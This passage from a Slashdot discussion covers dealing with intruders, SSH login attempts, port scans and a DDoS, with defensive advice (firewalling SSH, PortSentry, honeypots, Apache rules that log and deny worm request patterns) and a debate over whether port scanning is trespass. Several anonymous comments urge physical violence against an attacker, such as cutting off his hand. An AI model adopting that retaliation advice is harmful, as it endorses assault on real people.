      After the weekend, the owner of the computer came to me complaining that he couldn't log in. It turned out that the intruder wiped his whole home directory, which had no recent back-up!
      [...]
      These incidents have taught me the value of staying up-to-date

      Perhaps it also should have taught you the role that a religious zeal in making regular backups has as part of basic security?

      --
      //Information does not want to be free; it wants to breed.
    3. Re:Complaining may have a boomerang effect by Anonymous Coward · · Score: 0

      sshd...linux???

      so much for that "linux is secure outa the box" FUD that /. spreads...

  65. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    Alternatively: Get his RL location, pay him a personal visit. Get his F5 key plus all the rest of hardware fly some 5-10 meters in random direction (preferably down) (disregard any glass obstructing the flight route) and take a hard landing. You may use a heavy-caliber LART if he disturbs in the process. Preferably the job should be outsourced to a 3rd party subcontractor of foreign origin.

  66. Tactical nuke by kinema · · Score: 2, Funny

    I'm surprised nobody has suggested this before but I would recommend a tactical nuclear strike against the intruder. I've found that this simple step typically quells the attack.

    1. Re:Tactical nuke by DiscoDave_25 · · Score: 2, Funny

      George... Is that you?

    2. Re:Tactical nuke by Anonymous Coward · · Score: 0

      George... Is that you?

      No.

      Strategery, strongitude, and copious amounts of high-tech weaponry. The values our country is built on.

      Laura, where the hell is my pepto.. this election is gettin' to me.

  67. Ignore them or build general measures by DamonHD · · Score: 2, Insightful

    Hi,

    I ran one of the first ISPs in the UK with live IP and since we went live about 10 years ago we have endured on average maybe one attack per minute or higher all that time.

    So 10 years ago I wrote my own firewall with some traffic shaping and logging; it died recently I replaced it with a Cisco or two with more or less the same rules.

    Now, even when no longer an ISP I still have to turn away 35,000+ SPAMs per day from my network which now hosts just two people, so I wrote my own reverse SMTP proxy to deal with the problem. (The source is available in SourceForge BTW.)

    People continually attempt to steal the entire content of one of my free Web sites, and used to bring it and my connection to the Net to their knees, so I wrote a simple transparent servlet filter to detect and lock out f**kits who exhibited pathological behaviour.

    All of these tools are mainly automatic with a few general rules and a very few specific data entries to keep out especially egregious people.

    Don't play "whack-a-mole", and don't waste too much time trying to contact the idiot's ISP; even if they care, which sometimes they do, it'll end up being expensive and slow to stop.

    Rgds

    Damon

    --
    http://m.earth.org.uk/
  68. firewall - allow only certain IPs access port 22 by HTD · · Score: 2, Informative

    You said, YOU are running a server for ONE client. Who is it that needs SSH access to the machine - YOU. What i would do is limit access to port 22 to IP adresses I am going to use. Add your normal internet adresses to the list (like your ISPs IP-block, work, girlfriends isp, ...) And of course you need to add a machine that is alwas up and has no such firewall restrictions (i.e. shell access to your server at home, i know you have one ;-)). This way you can login to the server from your most common locations, and login indirectly to the server using another box as "proxy" in case you are on vacation sitting in an internet-cafe.

    i think it's also good practice to generally disallow direct root-logins in ssh-config and only allow shell users having group wheel to su to root.

  69. Re:Somewhat offtopic, but how do people deal with by Vo0k · · Score: 5, Informative

    Look up HTB on the net (Heuristic Token Bucket) - a firewall rule that limits network abuse while not obstructing normal network usage - every IP gets a pool of "tokens". One token is removed from the pool when a packet is sent, packets won't be sent as long as the pool is empty, but it gets refilled at constant, slow rate, until it's "full" again. So a user can download, say, 500K in one rapid burst at maximum network capacity, then his connection bandwidth goes down to some 5K. If he waits 100s he will be able to get 500K in similar burst again. This way, one page loads really fast. User reads the page, goes back, loads another one (minute later) very fast again. A loser who keeps reloading, exceeds his 500K bucket content in 2-3 reloads and then gets a constant drip of 5K upstream, hardly disturbing the others.

    --
    Anagram("United States of America") == "Dine out, taste a Mac, fries"
  70. Ignoring it == raising criminals by otisg · · Score: 1, Insightful

    Ignoring them and allowing them to continue poking systems around them is like letting people attempt robbing banks, shop lift, etc.

    Even if you don't manage to rob a bank, but you get caught, you go to jail. Why would syber laws have to be different? Don't touch my server! Don't scan my ports!

    --
    Simpy
    1. Re:Ignoring it == raising criminals by BlackHawk-666 · · Score: 4, Interesting
      If you don't want to ignore them, but rather take some action then you can combine tripwire (IIRC) with a shell action that firewalls their IP address. I used to do this for my home machine, but it's not really recommended for business machines. Here's what I did:

      Set up tripwire to detect incomming conenctions to 139, 1433 and other ports that people shouldn't be attempting to reach.

      Any attempts to open got a IPTABLES rule added against their IP

      Every couple of weeks I'd clear it down and let it build up again

      There would be better ways to do this, but it was mainly for basic home security and I wasn't worried about blocking whole companies (because of NAT/Proxy) because of one dick in the place. YMMV.

      --
      All those moments will be lost in time, like tears in rain.
    2. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 5, Insightful

      Don't scan my ports!


      I fail to see how scanning ports is akin to robbery. Actually a port scan by itself is a completely legitimate activity as it simply is querying what services are available.

      Personally I am the view point that if you have a port open with a service that is easily accessible without a password, or the default password, (like NFS, say) then anybody using it is not in the wrong, as how are they to tell that the service is not intended for the public especially since it is on the PUBLIC internet.

      I mean really, unless an attacker is DoSing your site due to resource issues I don't see how you can really conclude that the actions are malicious.

      I mean some of you guys sound like the ignorant dude that setup an RSS feed and then got pissed when a service used it as intended. The difference with him is that he learned the error of his ways.

      I also fail to see how someone using the word "syber" can run any server safely.

    3. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0
      I fail to see how scanning ports is akin to robbery. Actually a port scan by itself is a completely legitimate activity as it simply is querying what services are available.

      However it does violate most ISP's terms of service. i.e. the originator of the scan risks having their account suspended.

    4. Re:Ignoring it == raising criminals by otisg · · Score: 4, Insightful

      So if you leave the front door of your house open (by mistake or on purpose), it is okay for anyone to come in, check out what you have in the fridge, use your bathroom, etc.?

      Incidentally, this is similar to what happened to me yesterday. After hearing the noise coming from the other end of the apartment, I went to check it out and found a stranger in my bathroom. She followed some woman's directions and came to my bathroom, thinking it's a public bathroom, simply because I didn't lock my front door. I was polite, but I showed her the way out. I certainly couldn't just ignore her and let her be, could I?

      --
      Simpy
    5. Re:Ignoring it == raising criminals by Idarubicin · · Score: 5, Insightful
      I fail to see how scanning ports is akin to robbery. Actually a port scan by itself is a completely legitimate activity as it simply is querying what services are available.

      True, port scanning in and of itself is not comparable to robbery. Rather, it is like casing the joint: trying the doors to see if they're locked; testing the windows (ahem) for a good seal; checking all the security cameras to see where they're pointed, or if they're turned on at all.

      A business owner who saw someone doing that type of thing at their bricks and mortar presence might be a little suspicious. Sure, the 'port scanner' isn't doing anything illegal at the moment, but there are few applications for the information gathered that are legitimate. Most businesses (on- and offline) don't have much use or sympathy for freelance 'security consultants' providing convenient and unsolicited 'security audits' for them.

      The individuals attempting to login as root are admittedly being decidedly unsubtle, and are probably relatively harmless due to their lack of skill. On the other hand, if there was a mentally deficient individual wandering the neighbourhood trying to pull open front doors on random homes...wouldn't you want someone to at least keep an eye on him, even if you did keep your own door locked?

      I mean really, unless an attacker is DoSing your site due to resource issues I don't see how you can really conclude that the actions are malicious.

      What conclusions, pray, should be drawn from multiple attempts to gain root access to someone else's boxen? The original poster also specifically asked for an appropriate message to send that didn't sound like a corporate cease & desist--he just wants a 'kid, stop rattling my doorknob' message, to make the point that the 'investigator' has crossed from your 'public' internet on to a decidedly 'private' server.

      --
      ~Idarubicin
    6. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 5, Funny

      You fool! You had a strange woman just walk in and use your bathroom, and you let her get away? Arrrgg!

    7. Re:Ignoring it == raising criminals by dvoosten · · Score: 1

      So if you leave the front door of your house open (by mistake or on purpose), it is okay for anyone to come in, check out what you have in the fridge, use your bathroom, etc.?

      As a possible intruder is not actually physically touching any of your stuff, I think it is more correct to compare this person to someone peeking through your window to see what kind of books you have on your bookshelve.

      --
      -- Please put this in your sig if you think /. should stop posting NYTimes articles.
    8. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 1, Insightful

      isnt it more like walking around the building trying to find the front door? id hardly call checking the existance of a port "checking the locks"

    9. Re:Ignoring it == raising criminals by Uzik2 · · Score: 2, Insightful

      > Personally I am the view point that if you have a port open with a service that is easily accessible without a password, or the default password, (like NFS, say) then anybody using it is not in the wrong, as how are they to tell that the service is not intended for the public especially since it is on the PUBLIC internet

      If you have a radio controlled garage door opener
      and someone drives by your house, transmits all
      the possible codes sequentially, opens your garage
      door and starts looking through your stuff
      would you say 'because I didn't buy a sufficiently
      advanced garage door opener or engineer my own
      I invited the public into my garage'. Of course
      you wouldn't. Their intent is obviously to
      commit a crime.

      --
      -- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
    10. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      You should start setting up those net traps next time, and see what you can catch. If you get any playboy bunnies, let me know.

    11. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      I fail to see how scanning ports is akin to robbery. Actually a port scan by itself is a completely legitimate activity as it simply is querying what services are available.

      At one point this was legitimate in the days of yore. But.. welcome to the bad new world.

      I take exception with the term "completely".. this is bullshit. For instance, there is no way in hell running a full port scan on a private machine connected to a rr.com or home.com server is legitimate. And yeah, I've had it happen on a regular basis. Do I get my nose in a knot about it? No, because my box is secure.

      If you do this to a corporation and get their sustained attention, do not squeal when they roll out their legal department to make an example of somebody by pulling a Rubik's cube on existing laws to obtain the desired outcome.

    12. Re:Ignoring it == raising criminals by Trailer+Trash · · Score: 1

      She followed some woman's directions and came to my bathroom, thinking it's a public bathroom...

      I don't want to be a jerk, but did you fall for that line? I'd imagine she had planned a shopping trip until you showed up.

    13. Re:Ignoring it == raising criminals by waynelorentz · · Score: 1

      If scanning people's ports is completely OK with you, then how about the GOVERNMENT scanning your ports? The TLAs in Washington could put together a list of people with vulnerable machines to... um... warn them if there's a problem. Or just keep a database of what services everyone is running. After all, as you said, "a port scan by itself is a completely legitimate activity."

      3... 2... 1... Kablooey!

      ::All the tinfoil hat Slashdot Haxxors just exploded::

    14. Re:Ignoring it == raising criminals by Timothy+Brownawell · · Score: 1
      So if you leave the front door of your house open (by mistake or on purpose), it is okay for anyone to come in, check out what you have in the fridge, use your bathroom, etc.?
      If your house is in the middle of downtown and looks no different from a public business...

      Not really relevant anyway, considering that any incoming connections have to be accepted first; if you tell your computer to refuse connections, or even to ignore those that ask to connect, they won't be able to.

      So it's more like, if someone asks to come in and someone inside opens the door for them, is it ok for them to enter?

      Tim

    15. Re:Ignoring it == raising criminals by macdaddy · · Score: 1
      There's no sense in reinventing the wheel.

      Sentry Tools is what you need, specifically PortSentry.

      Craig Rowland wrote these tools before Cisco bought him out. He still makes 2 of the 3 available on Sourceforge. PortSentry is pretty damned slick. I only had one unfulfilled feature request.

    16. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      You didn't know we've been using your place as a public bathroom?

    17. Re:Ignoring it == raising criminals by macdaddy · · Score: 1

      IIRC (and I know I am) a US Federal court has held that port scanning was perfectly legal. If I had the time I'd find the docket number and link for ya'll. I thought I'd throw that into the discussion.

    18. Re:Ignoring it == raising criminals by Aeiri · · Score: 1

      No, that is completely different. What you are saying is brute forcing, he's saying the garage door has a button on it that opens the door no matter what.

    19. Re:Ignoring it == raising criminals by Fortran+IV · · Score: 1

      If you build your house in the middle of a public thoroughfare instead of on private property, yes. The Internet is a public highway. You are expected to mark the boundaries of your property.

      --
      I figure by 2030 or so my 6-digit UID will be something to brag about.
    20. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      Next time, I'll bet you have that X10 webcam running.

    21. Re:Ignoring it == raising criminals by KenFury · · Score: 1

      Not really, but I would not be at all suprised if someone did. I spent a year on a small community island. Nobody locked their doors day or night. It was very frequent to just walk in to a neighbors house. No knocking.

      Some times I think we forget the way the internet was orignaly planned to work. Just like a small town. Most services we set to be somewhat open. Just because ten thousand jack-offs are screwing it up does not mean that whe should automaticly assume malice. Some people just want to poke around like we did when we were kids.

    22. Re:Ignoring it == raising criminals by aneurysm36 · · Score: 1

      sure, peeking through my window.

      what legitimate purpose would a stranger have for looking through my window? none. 99% of people peeking through windows are people are just seeing what kind of stuff you have to steal.

      --
      ------ hi mom
    23. Re:Ignoring it == raising criminals by Uzik2 · · Score: 1

      I believe the example gets across the concept.

      There is no legitimate reason to port scan
      someone else's computer without their consent.
      It shows intent to commit a criminal or immoral
      act.

      If you do have a legitimate reason contact
      the owner of the system and ask for permission.

      Because their computer is connected to the
      internet it doesn't make it public property
      any more than your house is public property
      because it's congruent to a public street.

      --
      -- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
    24. Re:Ignoring it == raising criminals by rahard · · Score: 1
      You fool! You had a strange woman just walk in and use your bathroom, and you let her get away? Arrrgg!

      Well, he had to. She knows where he lives!

    25. Re:Ignoring it == raising criminals by markov_chain · · Score: 1

      I think of open well-known ports as putting your stuff out on the sidewalk, and entering the unlocked front door more like a port scan.

      --
      Tsunami -- You can't bring a good wave down!
    26. Re:Ignoring it == raising criminals by foooo · · Score: 1

      strange != hot.

      Now if the girl was hot and he let her get away... *that* is a tragedy.

      I personally, have gladly let undesirable women "get away".

    27. Re:Ignoring it == raising criminals by nairbv · · Score: 1
      People always use this analogy... that of leaving your door unlocked and someone walking in, or leaving your door locked and someone testing it.

      I was told once that because I port scanned a computer I could be charged with breaking and entering. It was bullshit but...

      What if a store leaves their door open? or even closed, with the door unlocked? or even closed with the door unlocked, and a big "closed" sign out front? If you walk in not noticing the sign, see that no-one's there and leave, you're going to be a little confused if the police try to charge you with breaking and entering. There was no breaking here, and there was no breaking with the port scan. Trespassing maybe? on a store? I see no "no trespassing" sign.

      How do you distinguish between a store (public service on the internet) and an unlocked house (home computer with an unintentionally left open anonymous ftp server) ? It's not like we have zoning regulations or something.

      Sometimes when someone sends me a link to a file for download, I'll remove the filename from the URL and get an index site listing what else they have available. The person might not have intended for me to be able to download the rest of their files, am I trespassing on them?

      How do you even define this random checking for existance of services as being malicious? because it's ssh its malicious? What about ftp? What about www? If I type in a random URL into a web browser to see if a site exists, and they didn't want me there, am I trespassing? Is the automation what makes it malicious? If I try a random ftp server, and they let me in "with email address as password" and they didn't want me there, am I breaking and entering? What if I look for anonymous ftp services automatedly? Search engines browse the web automatedly. What if I really did type the wrong IP address when trying to login to my box as root? What if it actually let me in!? Where do you draw the line?

    28. Re:Ignoring it == raising criminals by peawee03 · · Score: 1

      A script kiddie I know once told me that if they have unsecure anon FTP, a public-accessible NFS share, etc. on an internet-connected machine, then they deserve to get hit. Online ethics only matter amongst those who care about it to begin with.

      Say, what about creating an association of system admins to cover each other's backs in regards to hacking? Such as shared blacklists, letting each other know if one of the member's machines was zombified, etc. Just an idea.

      --
      I wish I could write clever and witty sigs.
    29. Re:Ignoring it == raising criminals by Lodragandraoidh · · Score: 1

      Sounds like the begining of one of those action adventure movies, where the girl is really not in the bathroom to use it, rather to get away from 2 thugs following her on the street, because she has the plans to the new uberwidget from her corporation. Feeling sorry for her, the young man offers his services and helps her on her quest. Several car chases, gun battles, and brawls later we discover she was using the guy, and is, in fact, a spy attempting to shuttle the goods out of the country. Broken hearted (literally) our protagonist is left in a pool of his own assorted body fluids as his view of her walking away with her smoking handgun fades to black FIN

      --

      Lodragan Draoidh
      The more you explain it, the more I don't understand it. - Mark Twain
    30. Re:Ignoring it == raising criminals by osu-neko · · Score: 1
      Because their computer is connected to the internet it doesn't make it public property any more than your house is public property because it's congruent to a public street.

      No, but there's nothing wrong with my entering your house if you've put a sign in your front yard saying "Open House". And there's nothing wrong with me looking in your front yard to see any signs posted as I drive by. The fact that your house doesn't become public property is irrelevant to the question at hand.

      You connect to the public Internet, you open a port to a service, and you allow anyone anywhere to connect to it. Turning around and claiming someone is doing something wrong by merely scanning to see if you've got the online equivalent of an "Open House" sign in your yard is silly.

      --
      "Convictions are more dangerous enemies of truth than lies."
    31. Re:Ignoring it == raising criminals by Uzik2 · · Score: 2, Insightful

      > You connect to the public Internet, you open a port to a service, and you allow anyone anywhere to connect to it.

      In the majority of cases this is not true.
      People who use computers as an appliance, the
      majority of Windows users, do not *choose* to
      open ports. They don't know the port is open,
      what a port is, how to close it, nor are they
      presented with the option to NOT run the services
      that open the ports at install time.

      > there's nothing wrong with my entering your house if you've put a sign in your front yard saying "Open House".

      All of the ports marked 'Open House' are already
      quite well known. There's no need to scan for the
      port for the web server. Anyone port scanning
      is NOT looking for an open house sign in my yard,
      they're snooping in my back yard looking for a
      unsecured entrance to break in.

      --
      -- Programming with boost is like building a house with lego. It's a cool but I wouldn't want to live in it
    32. Re:Ignoring it == raising criminals by x-caiver · · Score: 1

      A public web server is not comparable to a private home; it is comparable to a public store.
      Port scanning is not the equivalent of going through someone's personal fridge; it is comparable to looking at a stores merchandise.

      Yesterday I walked in to a store I had never been in before. I had no intention of purchasing any of the things they sold (based on the store's name, and the display in the main window I could tell it was for clothing). I went in and looked around (think: port scanned), and discovered that this clothing store also sold Jones Soda. I happened to be thristy, so I bought it.

      I'm pretty sure that the store manager was not pissed, and did not call the cops becuase I was looking around...

    33. Re:Ignoring it == raising criminals by Bargeld · · Score: 1

      It's not quite that apt of an analogy. The Internet IS a public network. A closer analogy might be: if you leave a newspaper you bought lying on a public park bench, is it illegal for someone to pick it up and start reading it? Even that isn't a particularly good comparison.

      Mind you, this is assuming that any given service _doesn't_ have an explicit disclaimer that the system is a private one, and only 'authorized access' is permitted for any given content or resource.

      The US federal code (title 18 USC) is pretty clear on this point, with emphasis on "knowing intent to defraud" "without authorization". State and local laws in the US are sometimes more broad in regard to "intent", so YYMV, IANAL and all that whatnot :) But as a rule of thumb, even "logging in as [user other than yourself]" isn't demonstrably a crime in and of itself. What you do after the fact determines the intent.

      --Bargeld

      --
      "I hate to advocate drugs, alcohol, violence, or insanity to anyone. But they've always worked for me." --Dr. Hunter S.
    34. Re:Ignoring it == raising criminals by whittrash · · Score: 1

      A computer is personal property. You do not have a right to tresspass on personal property. If you both tresspass and cause damage, you are liable for both infractions. This isn't complicated.

    35. Re:Ignoring it == raising criminals by maximilln · · Score: 1

      This isn't complicated

      It is, however, nearly impossible to retain the services of an attorney to present it to a court of law. It is also impossible to convince local authorities to take you as an individual citizen seriously should you try to report such an incident.

      Yet another region of law where only large corporations have any chance of achieving enforcement.

      --
      +++ATHZ 99:5:80
    36. Re:Ignoring it == raising criminals by bugnuts · · Score: 1

      You should instead set it up to block them for an hour. Include pings, smnp, smtp/pop/whatever on hosts without those services, and all sorts of port scanning. The moment you see an illegitimate packet, you become a black hole to them. Sneakers scans would work, but it would take weeks... and it's very unlikely a kiddie would care enough to try.

      But make DAMN sure that:
      1) you drop any packets from the outside that appear to originate from inside your network
      2) you don't accept source route packets ... otherwise you risk someone sending you a DoS on yourself, which would be pretty hilarious.

    37. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      On the other hand, if there was a mentally deficient individual wandering the neighbourhood trying to pull open front doors on random homes...wouldn't you want someone to at least keep an eye on him

      Why should you want someone to keep an eye on him? It is very unlikely that a mentally deficient person would attempt to hurt or rob you.

    38. Re:Ignoring it == raising criminals by whittrash · · Score: 1

      I think it is more correct to compare this person to someone peeking through your window to see what kind of books you have on your bookshelve

      Sorry bub, but that is against the law in addition to being socially unacceptable. It is one thing to look into a storefront, another entirely to creep onto my property and peek in my bedroom to see my what kind of pr0n is on my bookcase. If I happen to lounge in the living room with my lady friend who is dressed like an angel in lace and wearing a Richard Nixon mask and has me chained to a post, naked, while she whips my ass and tells me what a bad Democrat I have been, I don't think some random dude has the right to see that, I don't care if he was curious about my reading habits. If people do that to me, I am inclined to pull out my shotgun and tell them to get the hell off of my land. In some states I am fully empowered to pull the trigger, and will be roundly congratulated if the person shot is a freak, a wierdo or a deviant. Its self defense. Not even the FBI is empowered to sneak and peek without a warrant. That kind of communist thinking doesn't belong in the USA.

      Anywhere private information is kept is off limits by social convention first, and by the law second. If we can't have privacy, we can't have freedom.

    39. Re:Ignoring it == raising criminals by whittrash · · Score: 1

      True, but people don't have a right to tresspass.

    40. Re:Ignoring it == raising criminals by Mhtsos · · Score: 1

      I'm sorry to be the one to tell you, but sex is probably the only (somewhat) accurate thing pr0n movies depict. The plot is way off reality.

    41. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      There is a difference. On the internet, you can't tell which bathrooms are public, and which are in private homes. If there is an open FTP server, you can assume it was meant to be used--couldn't you? Because if you wanted it private, surely you would have added a password. Public services should be considered public if there was no indication of privacy.

    42. Re:Ignoring it == raising criminals by bot24 · · Score: 1

      Seven or eight years ago I had a little kid that I had never seen before walk into our house(it was obviously a private residense), right behind us while we were watching TV, and use our bathroom. That is wierd when people just wander into your house and use stuff...

    43. Re:Ignoring it == raising criminals by Aeiri · · Score: 1

      Isn't that what DShield does?

    44. Re:Ignoring it == raising criminals by peawee03 · · Score: 1

      I've just gotten into the whole admin "thing", so there's tonnes I still don't know about. Thanks.

      --
      I wish I could write clever and witty sigs.
    45. Re:Ignoring it == raising criminals by Anonymous Coward · · Score: 0

      You must live in a dump if people can mistake your house for a public restroom.

  71. Re:Somewhat offtopic, but how do people deal with by zyche · · Score: 0

    I'm not sure this will work in your case.

    Most people is probably not aware of the fact that your MAC address is transmitted over the Internet, peer to peer (except in those cases where it's explictly scrubbed ofcourse). While its not that common that firewalls can block trafic on the MAC level, some can, OpenBSD's pf being one example. But then again, if someone is using open proxies, this technique will probably fail as the proxie will send its own MAC address.

    But how about logging access to the site, and sending clients that sends to many requests per second to TubGirl? :-)

  72. Re:Somewhat offtopic, but how do people deal with by bretharder · · Score: 1

    I accually know his address and his real name.
    Although I would like to give him a beating; I don't really think that is an option.

  73. setup honeypots / decoys by bani · · Score: 1

    let them waste their time with those, misdirecting their attention away from your real servers.

    works for me. its quite amusing to watch 5kr1p7 k1dd135 waste days/weeks on what they consider an "interesting" target.

  74. No letters, please! by Maljin+Jolt · · Score: 1

    It is not a much wise to solve your situation with C&D letters. You should not offload your own responsibility to others, because it is annoying, risky and ineffective in the long run.

    Generally, flaws in any technology setup should not be solved by legal, but by engineering. Try to explore your intellect a little bit why it is so.

    --
    There you are, staring at me again.
  75. Re:What intruders? - Good point! by JWSmythe · · Score: 3, Insightful


    Good advice. Just ignore that script kiddies are trying stuff. Until one of them gets a 0-day exploit, roots one of your critical machines, and wipes out all your data.

    --
    Serious? Seriousness is well above my pay grade.
  76. Remote logins? Are you insane? by smoon · · Score: 4, Informative

    Don't you use a firewall? You can't attempt to log in remotely if you're blocking the typical remote access ports -- SSH, telnet, etc.

    So you've got a machine sitting on the internet, home to a million and one active worms, and are surprised that it gets scanned constantly?

    Don't bother with the abuse reports -- more than likely it's just worm activity from computers whose clueless owners don't realize have been infected. A more recent one attempts SSH logins, which may be what you're seeing.

    It it was a _real_ crack attempt then you:
    1: Wouldn't know about it.
    2: Would be unable to pin it down. It would be bounced through several victim networks, so your ability to see where it's "coming from" is really just the last victim machine in the chain.

    Third possibility is script kiddies, in which case you would know about it and where they were coming from, but they would have no chance of success unless you are unwilling to keep up on patches and follow basic security practices like decent passwords.

    Best would be to close off remote-login ports altogether. If you need remote login then block for all but the address range you'd be coming from. If you need remote access from random locations, then at least consider using a heavily locked down system (e.g.: OpenBSD) or work _really hard_ to get your systems firewall/logging/etc. set up well.

    One OpenBSD/pf feature you might be interested in (also available from other systems) is the ability to tie Snort into the pf ruleset so that remote scanners, once detected, are ignored.

    --
    "But actually trying to use m4 as a general-purpose langage would be deeply perverse" --ESR
  77. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    Although I would like to give him a beating; I don't really think that is an option.

    Thats where friends come in. Get them to go pay this little shit a visit, cut off one of his hands, and tell him that if he does this type of shit again he'll lose the other. Works every time.

  78. Re:Somewhat offtopic, but how do people deal with by phek · · Score: 1

    Well you're not really giving in. If you want to host a website and be able to have the same resources as anyone else who wants to host a legit website, then you'll pay some company to either host it for you, or buy more bandwidth from a provider who specializes in internet connections for hosting your own servers. If lets say you were on a t1 and someone was DOS'ing you, you could call up your provider and tell them to block them before it gets sent down your smaller pipe.

    Another option would be to install an IDS to block any host that tries to grab like 3 pages per second or whatever, but I'm personally against IDS's since a malicious person could use them against you. Or you may want to look into using iptables' limit module, but this would be an even worse solution because it would only allow N new connections every X seconds from every host, so lets say you say 5 connections per 1 second, the 6th person who tries to access your site that second would be blocked.

    For this situation (assuming you don't want to "give in" and get a faster connection), an IDS would really be your only option, but there's a lot of other things he could do to you that would take your site down and you couldn't do anything about since your connection is so slow, and your ISP isn't willing to help.

  79. This is more fun! by Ch_Omega · · Score: 4, Informative

    In my opinon, Tom Hudson's way of dealing with these critters, is far more entertaining, than just ignoring them.

    1. Re:This is more fun! by Anonymous Coward · · Score: 0

      Wow, what kind of LUS3R has a geocities homepage? I thought that was just for white supremacist groups, bad cat pictures and teen girls who write in SMS speak.

    2. Re:This is more fun! by nahdude812 · · Score: 4, Informative

      A lot of these exploits are typically ancient worms that someone has managed to not clean off their computer. If it's not an ancient worm, it's probably a zomibe in someone's hoarde.

      The problem with these two (most common) scenarios that the person who owns the computer isn't the real perpetrator, and the ability to track the perp down requires much more work than a simple whois lookup of the offending IP.

      Most attacks you see are going to be automated and launched on a wide scale. There are thousands and thousands of compromised Windows machines out on the net that are being used by people such as spammers and crackers for their dirty work.

      Lock your box down.
      Don't allow root to log in on SSH.
      Lock SSH and other sensitive services down to specific IP address blocks if you can. If you can't, investigate port knocking if you can do that. If you can't even go that far, investigate implementing a lockout policy for failed login attempts.

      Unless you see a single host being the source of a large pile of offensive behavior, chances are these are machines in a zombie hoarde. If it is limited to a single IP or a few IP's in a single C class, contact the ISP's abuse department *politely* (remember these are folks like you in jobs like yours, if you go in with guns blazing, they're less likely to help) and provide as much information as you can regarding the nature of the attack. Then firewall off the offending IPs.

      I used to aggressively track intrusion attempts and spam. I had a little PHP/MySQL tool I wrote where I could log these things, dumping in offending logs (or spam source), and it'd extract the culprit IP address, and once a day go through, looking up abuse addresses on whois and mailing a digest of the day's activities for that ISP to them.

      Ultimately I probably got about a 1% response rate from the ISP's (excluding auto-responses). After ~6 months of this, and about 40,000 records in my database, I started some statistical analysis. It turns out that there were no significant outliers for abusive activity from any given ISP (considering the size of that ISP's net blocks). Basically every intrusion attempt was some kind of zombie. There were probably a few by-hand attempts, but these are typically so low profile that there's no easy way to distinguish them from the hoardes.

      Some time later I was the recipient of a DDoS attack. Someone's zombie hoarde decided to repeatedly visit a page on my website that turns out to be a bit resource intensive to generate (my code is open source, so whoever devised this probably knew that). Every day, ~25,000 IP's each requested the same page every 4 minutes (+/- a few seconds I suppose for network latency). 375,000 hits an hour = 9,000,000 bogus hits a day. Day to day this number fluctuated, and the ISP's involved in the attack kept changing. It was obvious to me that whoever was driving the attack wasn't exposing the entire zombie hoarde to me at any given point because of how the ISP's involved kept shifting around. I figured he probably had a script set up to launch X number of zombies every day, and they probably had commands to execute for ~24 hours. The number was always pretty close to 25,000, never over, but usually more than 24,500.

      Ultimately the attack lasted about a month. I figured out a simple way to distinguish the zombie computers from legitimate users based on an error in the request headers, and I could just exit() at the top of my site for those who exhibited this error. I also logged the attempts I blocked, and was left with over 900,000 distinct IP addresses once the attack finally stopped.

      My point in all of that is that there *are* zombie hoardes out there, and it's the zombie hoardes that are most likely to compromise you. There's little you can do about it because getting a single IP from a hoarde firewalled off or cleaned up won't slow down your real attacker who was going to use a different zombie the next day anyhow.

    3. Re:This is more fun! by Lumpy · · Score: 1

      Some time later I was the recipient of a DDoS attack. Someone's zombie hoarde decided to repeatedly visit a page on my website that turns out to be a bit resource intensive to generate (my code is open source, so whoever devised this probably knew that). Every day, ~25,000 IP's each requested the same page every 4 minutes (+/- a few seconds I suppose for network latency). 375,000 hits an hour = 9,000,000 bogus hits a day.

      is there anything in apache that can be set up to control this? I have a built in anti-slashdot function script I wrote, that if my site was linked from slashdot it only returns a static text only version of that page with no links to anywhere else in the site.. this satisfies the slashdotters by giving the information, satisfies my co-lo company by reducing the load on the pipeline drastically and keeps me from melting into a puddle of black goo...

      triggering from a single referrer is easy, but triggering based on load I can not think of how to do that....

      is there a way to make apache throttle and refuse multiple requests from the same host too quickly??

      --
      Do not look at laser with remaining good eye.
    4. Re:This is more fun! by LearnToSpell · · Score: 1

      Hmm. I don't know that I'd want to block everything on that list. vti_bin in your logs can have other meanings than just worm attacks.

    5. Re:This is more fun! by suss · · Score: 1

      Don't link to geocities pages on slashdot, they will last about 30 seconds. Use the Google Cache instead.

    6. Re:This is more fun! by Tassach · · Score: 3, Informative

      mod_throttle and mod_bandwidth are pretty useful if you're running Apache 1.3; unfortunately (last time I checked) they aren't working right under 2.0 yet.

      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    7. Re:This is more fun! by Tassach · · Score: 3, Interesting
      Why waste bandwidth and CPU time sending a page back to what's most likely a worm-infected machine? The default 404 response is more than adequate. His RedirectMatch hack is pretty good, but you can use the same regexps in SetEnvIf rules:
      #regexp rules to set environment variables
      SetEnvIf Request_URI "(regexp1)" ATTACK
      SetEnvIf Request_URI "(regexp2)" ATTACK
      ...

      # Anything that matches a worm/virus attack pattern goes in a special log
      CustomLog logs/attack_log common env=ATTACK

      # Everything that's not an attack goes on the normal log
      CustomLog logs/access_log common env=!ATTACK
      This puts all the zombie/worm attacks into a seperate log file. This also allows me to have logrotate truncate the attack_log and the access_log on different schedules.
      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    8. Re:This is more fun! by Tassach · · Score: 3, Interesting
      Opps... forgot the most important part:
      <Location />
      Order Allow,Deny
      Allow from all
      Deny from env=ATTACK
      ErrorDocument 403 "Worm Attack Suspected - Access Denied
      </Location>
      You could replace the errordocument with a PHP or CGI to send back a page of shame instead of static text, but why bother?
      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    9. Re:This is more fun! by nahdude812 · · Score: 1

